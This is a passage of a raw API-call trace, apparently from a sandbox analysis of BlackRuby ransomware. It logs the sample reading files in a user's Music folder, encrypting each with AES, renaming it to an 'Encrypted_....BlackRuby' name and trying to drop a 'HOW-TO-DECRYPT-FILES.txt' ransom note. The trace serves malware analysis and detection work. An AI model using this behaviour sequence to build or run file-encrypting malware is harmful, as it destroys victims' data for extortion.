ftCreationTime.dwHighDateTime=0x1d356c3, ftLastAccessTime.dwLowDateTime=0x38516750, ftLastAccessTime.dwHighDateTime=0x1d34dd8, ftLastWriteTime.dwLowDateTime=0x38516750, ftLastWriteTime.dwHighDateTime=0x1d34dd8, nFileSizeHigh=0x0, nFileSizeLow=0x10a6)) returned 1 [0060.113] GetLastError () returned 0x5 [0060.113] SetErrorMode (uMode=0x0) returned 0x1 [0060.113] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.113] GetLastError () returned 0x5 [0060.113] SetErrorMode (uMode=0x1) returned 0x0 [0060.114] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.114] GetLastError () returned 0x5 [0060.115] SetErrorMode (uMode=0x0) returned 0x1 [0060.115] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", lpFilePart=0x0) returned 0x20 [0060.115] GetLastError () returned 0x5 [0060.115] SetErrorMode (uMode=0x1) returned 0x0 [0060.115] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3" (normalized: "c:\\users\\eebsym5\\music\\j7jqm.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1bbb1dc | out: lpFileInformation=0x1bbb1dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x604c4be0, ftCreationTime.dwHighDateTime=0x1d34d7d, ftLastAccessTime.dwLowDateTime=0x799284c0, ftLastAccessTime.dwHighDateTime=0x1d34c01, ftLastWriteTime.dwLowDateTime=0x799284c0, ftLastWriteTime.dwHighDateTime=0x1d34c01, nFileSizeHigh=0x0, nFileSizeLow=0xe0d9)) returned 1 [0060.115] GetLastError () returned 0x5 [0060.115] SetErrorMode (uMode=0x0) returned 0x1 [0060.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", lpFilePart=0x0) returned 0x20 [0060.116] GetLastError () returned 0x5 [0060.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", lpFilePart=0x0) returned 0x20 [0060.116] GetLastError () returned 0x5 [0060.116] SetErrorMode (uMode=0x1) returned 0x0 [0060.116] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3" (normalized: "c:\\users\\eebsym5\\music\\j7jqm.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.116] GetLastError () returned 0x0 [0060.116] GetFileType (hFile=0x184) returned 0x1 [0060.116] SetErrorMode (uMode=0x0) returned 0x1 [0060.116] GetFileType (hFile=0x184) returned 0x1 [0060.116] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xe0d9 [0060.116] GetLastError () returned 0x0 [0060.116] ReadFile (in: hFile=0x184, lpBuffer=0x1bbd06c, nNumberOfBytesToRead=0xe0d9, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bbd06c*, lpNumberOfBytesRead=0x18ed84*=0xe0d9, lpOverlapped=0x0) returned 1 [0060.117] GetLastError () returned 0x0 [0060.117] CloseHandle (hObject=0x184) returned 1 [0060.117] GetLastError () returned 0x0 [0060.117] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", lpFilePart=0x0) returned 0x20 [0060.117] GetLastError () returned 0x0 [0060.117] SetErrorMode (uMode=0x1) returned 0x0 [0060.117] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3" (normalized: "c:\\users\\eebsym5\\music\\j7jqm.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x604c4be0, ftCreationTime.dwHighDateTime=0x1d34d7d, ftLastAccessTime.dwLowDateTime=0x799284c0, ftLastAccessTime.dwHighDateTime=0x1d34c01, ftLastWriteTime.dwLowDateTime=0x799284c0, ftLastWriteTime.dwHighDateTime=0x1d34c01, nFileSizeHigh=0x0, nFileSizeLow=0xe0d9)) returned 1 [0060.117] GetLastError () returned 0x0 [0060.117] SetErrorMode (uMode=0x0) returned 0x1 [0060.117] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0060.118] GetLastError () returned 0x0 [0060.150] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c335ac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0060.150] GetLastError () returned 0x0 [0060.150] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.150] GetLastError () returned 0x0 [0060.155] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.155] GetLastError () returned 0x0 [0060.155] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0060.155] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.155] GetLastError () returned 0x0 [0060.155] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c605f8*=0x1, dwFlags=0x0) returned 1 [0060.155] GetLastError () returned 0x0 [0060.155] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c605c4, dwFlags=0x0) returned 1 [0060.155] GetLastError () returned 0x0 [0060.155] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c60640*, pdwDataLen=0x18ed74*=0xe1d0, dwBufLen=0xe1d0 | out: pbData=0x1c60640*, pdwDataLen=0x18ed74*=0xe1d0) returned 1 [0060.156] GetLastError () returned 0x0 [0060.156] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c7ca0c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c7ca0c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.156] GetLastError () returned 0x0 [0060.156] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c7ca3c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c7ca3c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.156] GetLastError () returned 0x0 [0060.156] CryptDestroyKey (hKey=0x360fa0) returned 1 [0060.157] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.157] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", lpFilePart=0x0) returned 0x20 [0060.157] GetLastError () returned 0x0 [0060.157] SetErrorMode (uMode=0x1) returned 0x0 [0060.157] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3" (normalized: "c:\\users\\eebsym5\\music\\j7jqm.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.158] GetLastError () returned 0xb7 [0060.158] GetFileType (hFile=0x184) returned 0x1 [0060.158] SetErrorMode (uMode=0x0) returned 0x1 [0060.158] GetFileType (hFile=0x184) returned 0x1 [0060.159] CloseHandle (hObject=0x184) returned 1 [0060.159] GetLastError () returned 0xb7 [0060.159] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3", lpFilePart=0x0) returned 0x20 [0060.159] GetLastError () returned 0xb7 [0060.159] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_pfhJ4JlopnVQpII9pCZ5j2QZ1bccex6ckZPUdO58xt.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_pfhJ4JlopnVQpII9pCZ5j2QZ1bccex6ckZPUdO58xt.BlackRuby", lpFilePart=0x0) returned 0x55 [0060.159] GetLastError () returned 0xb7 [0060.159] SetErrorMode (uMode=0x1) returned 0x0 [0060.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3" (normalized: "c:\\users\\eebsym5\\music\\j7jqm.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x604c4be0, ftCreationTime.dwHighDateTime=0x1d34d7d, ftLastAccessTime.dwLowDateTime=0x799284c0, ftLastAccessTime.dwHighDateTime=0x1d34c01, ftLastWriteTime.dwLowDateTime=0x2c0de760, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xe1e0)) returned 1 [0060.159] GetLastError () returned 0xb7 [0060.160] SetErrorMode (uMode=0x0) returned 0x1 [0060.160] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\j7Jqm.mp3" (normalized: "c:\\users\\eebsym5\\music\\j7jqm.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_pfhJ4JlopnVQpII9pCZ5j2QZ1bccex6ckZPUdO58xt.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_pfhj4jlopnvqpii9pcz5j2qz1bccex6ckzpudo58xt.blackruby")) returned 1 [0060.160] GetLastError () returned 0xb7 [0060.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.160] GetLastError () returned 0xb7 [0060.160] SetErrorMode (uMode=0x1) returned 0x0 [0060.160] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.160] GetLastError () returned 0x5 [0060.161] SetErrorMode (uMode=0x0) returned 0x1 [0060.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", lpFilePart=0x0) returned 0x21 [0060.161] GetLastError () returned 0x5 [0060.161] SetErrorMode (uMode=0x1) returned 0x0 [0060.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav" (normalized: "c:\\users\\eebsym5\\music\\ja ws8.wav"), fInfoLevelId=0x0, lpFileInformation=0x1ca7cc0 | out: lpFileInformation=0x1ca7cc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cff4240, ftCreationTime.dwHighDateTime=0x1d34a0b, ftLastAccessTime.dwLowDateTime=0xe5c5f180, ftLastAccessTime.dwHighDateTime=0x1d34b53, ftLastWriteTime.dwLowDateTime=0xe5c5f180, ftLastWriteTime.dwHighDateTime=0x1d34b53, nFileSizeHigh=0x0, nFileSizeLow=0xd448)) returned 1 [0060.161] GetLastError () returned 0x5 [0060.161] SetErrorMode (uMode=0x0) returned 0x1 [0060.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", lpFilePart=0x0) returned 0x21 [0060.162] GetLastError () returned 0x5 [0060.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", lpFilePart=0x0) returned 0x21 [0060.162] GetLastError () returned 0x5 [0060.162] SetErrorMode (uMode=0x1) returned 0x0 [0060.162] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav" (normalized: "c:\\users\\eebsym5\\music\\ja ws8.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.162] GetLastError () returned 0x0 [0060.162] GetFileType (hFile=0x184) returned 0x1 [0060.162] SetErrorMode (uMode=0x0) returned 0x1 [0060.162] GetFileType (hFile=0x184) returned 0x1 [0060.162] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xd448 [0060.162] GetLastError () returned 0x0 [0060.162] ReadFile (in: hFile=0x184, lpBuffer=0x1ca975c, nNumberOfBytesToRead=0xd448, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ca975c*, lpNumberOfBytesRead=0x18ed84*=0xd448, lpOverlapped=0x0) returned 1 [0060.163] GetLastError () returned 0x0 [0060.163] CloseHandle (hObject=0x184) returned 1 [0060.163] GetLastError () returned 0x0 [0060.163] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", lpFilePart=0x0) returned 0x21 [0060.163] GetLastError () returned 0x0 [0060.163] SetErrorMode (uMode=0x1) returned 0x0 [0060.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav" (normalized: "c:\\users\\eebsym5\\music\\ja ws8.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cff4240, ftCreationTime.dwHighDateTime=0x1d34a0b, ftLastAccessTime.dwLowDateTime=0xe5c5f180, ftLastAccessTime.dwHighDateTime=0x1d34b53, ftLastWriteTime.dwLowDateTime=0xe5c5f180, ftLastWriteTime.dwHighDateTime=0x1d34b53, nFileSizeHigh=0x0, nFileSizeLow=0xd448)) returned 1 [0060.163] GetLastError () returned 0x0 [0060.163] SetErrorMode (uMode=0x0) returned 0x1 [0060.174] CryptImportKey (in: hProv=0x37c790, pbData=0x1d1e374, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0060.174] GetLastError () returned 0x0 [0060.174] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.174] GetLastError () returned 0x0 [0060.179] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.179] GetLastError () returned 0x0 [0060.179] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0060.179] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.179] GetLastError () returned 0x0 [0060.179] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1d4b3c0*=0x1, dwFlags=0x0) returned 1 [0060.179] GetLastError () returned 0x0 [0060.179] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1d4b38c, dwFlags=0x0) returned 1 [0060.179] GetLastError () returned 0x0 [0060.179] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d4b408*, pdwDataLen=0x18ed74*=0xd540, dwBufLen=0xd540 | out: pbData=0x1d4b408*, pdwDataLen=0x18ed74*=0xd540) returned 1 [0060.179] GetLastError () returned 0x0 [0060.183] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7deb0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b7deb0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.183] GetLastError () returned 0x0 [0060.183] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7dee0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b7dee0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.183] GetLastError () returned 0x0 [0060.184] CryptDestroyKey (hKey=0x360a20) returned 1 [0060.184] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.184] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", lpFilePart=0x0) returned 0x21 [0060.184] GetLastError () returned 0x0 [0060.184] SetErrorMode (uMode=0x1) returned 0x0 [0060.184] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav" (normalized: "c:\\users\\eebsym5\\music\\ja ws8.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.185] GetLastError () returned 0xb7 [0060.185] GetFileType (hFile=0x184) returned 0x1 [0060.185] SetErrorMode (uMode=0x0) returned 0x1 [0060.185] GetFileType (hFile=0x184) returned 0x1 [0060.185] WriteFile (in: hFile=0x184, lpBuffer=0x1b7df10*, nNumberOfBytesToWrite=0xd550, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1b7df10*, lpNumberOfBytesWritten=0x18ed90*=0xd550, lpOverlapped=0x0) returned 1 [0060.186] GetLastError () returned 0xb7 [0060.186] CloseHandle (hObject=0x184) returned 1 [0060.188] GetLastError () returned 0xb7 [0060.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav", lpFilePart=0x0) returned 0x21 [0060.188] GetLastError () returned 0xb7 [0060.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_cVjX9MLdAQCjHCetyTmJGyqAE2kbUJSWvyRQf.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_cVjX9MLdAQCjHCetyTmJGyqAE2kbUJSWvyRQf.BlackRuby", lpFilePart=0x0) returned 0x50 [0060.188] GetLastError () returned 0xb7 [0060.188] SetErrorMode (uMode=0x1) returned 0x0 [0060.188] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav" (normalized: "c:\\users\\eebsym5\\music\\ja ws8.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cff4240, ftCreationTime.dwHighDateTime=0x1d34a0b, ftLastAccessTime.dwLowDateTime=0xe5c5f180, ftLastAccessTime.dwHighDateTime=0x1d34b53, ftLastWriteTime.dwLowDateTime=0x2c1048c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd550)) returned 1 [0060.188] GetLastError () returned 0xb7 [0060.188] SetErrorMode (uMode=0x0) returned 0x1 [0060.188] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\Ja ws8.wav" (normalized: "c:\\users\\eebsym5\\music\\ja ws8.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_cVjX9MLdAQCjHCetyTmJGyqAE2kbUJSWvyRQf.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_cvjx9mldaqcjhcetytmjgyqae2kbujswvyrqf.blackruby")) returned 1 [0060.190] GetLastError () returned 0xb7 [0060.190] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.190] GetLastError () returned 0xb7 [0060.190] SetErrorMode (uMode=0x1) returned 0x0 [0060.190] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.191] GetLastError () returned 0x5 [0060.192] SetErrorMode (uMode=0x0) returned 0x1 [0060.192] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", lpFilePart=0x0) returned 0x27 [0060.192] GetLastError () returned 0x5 [0060.192] SetErrorMode (uMode=0x1) returned 0x0 [0060.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3" (normalized: "c:\\users\\eebsym5\\music\\jbeiguye0ia7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1ba84c8 | out: lpFileInformation=0x1ba84c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7691c60, ftCreationTime.dwHighDateTime=0x1d35093, ftLastAccessTime.dwLowDateTime=0xfadc0270, ftLastAccessTime.dwHighDateTime=0x1d35702, ftLastWriteTime.dwLowDateTime=0xfadc0270, ftLastWriteTime.dwHighDateTime=0x1d35702, nFileSizeHigh=0x0, nFileSizeLow=0x7475)) returned 1 [0060.192] GetLastError () returned 0x5 [0060.192] SetErrorMode (uMode=0x0) returned 0x1 [0060.193] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", lpFilePart=0x0) returned 0x27 [0060.193] GetLastError () returned 0x5 [0060.193] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", lpFilePart=0x0) returned 0x27 [0060.193] GetLastError () returned 0x5 [0060.193] SetErrorMode (uMode=0x1) returned 0x0 [0060.193] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3" (normalized: "c:\\users\\eebsym5\\music\\jbeiguye0ia7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.193] GetLastError () returned 0x0 [0060.193] GetFileType (hFile=0x184) returned 0x1 [0060.193] SetErrorMode (uMode=0x0) returned 0x1 [0060.193] GetFileType (hFile=0x184) returned 0x1 [0060.193] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x7475 [0060.193] GetLastError () returned 0x0 [0060.193] ReadFile (in: hFile=0x184, lpBuffer=0x1baa248, nNumberOfBytesToRead=0x7475, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1baa248*, lpNumberOfBytesRead=0x18ed84*=0x7475, lpOverlapped=0x0) returned 1 [0060.194] GetLastError () returned 0x0 [0060.194] CloseHandle (hObject=0x184) returned 1 [0060.194] GetLastError () returned 0x0 [0060.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", lpFilePart=0x0) returned 0x27 [0060.194] GetLastError () returned 0x0 [0060.194] SetErrorMode (uMode=0x1) returned 0x0 [0060.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3" (normalized: "c:\\users\\eebsym5\\music\\jbeiguye0ia7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7691c60, ftCreationTime.dwHighDateTime=0x1d35093, ftLastAccessTime.dwLowDateTime=0xfadc0270, ftLastAccessTime.dwHighDateTime=0x1d35702, ftLastWriteTime.dwLowDateTime=0xfadc0270, ftLastWriteTime.dwHighDateTime=0x1d35702, nFileSizeHigh=0x0, nFileSizeLow=0x7475)) returned 1 [0060.194] GetLastError () returned 0x0 [0060.194] SetErrorMode (uMode=0x0) returned 0x1 [0060.194] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0060.194] GetLastError () returned 0x0 [0060.229] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c12edc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0060.229] GetLastError () returned 0x0 [0060.229] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.229] GetLastError () returned 0x0 [0060.234] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0060.234] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c3ff28*=0x1, dwFlags=0x0) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c3fef4, dwFlags=0x0) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3ff70*, pdwDataLen=0x18ed74*=0x7570, dwBufLen=0x7570 | out: pbData=0x1c3ff70*, pdwDataLen=0x18ed74*=0x7570) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, 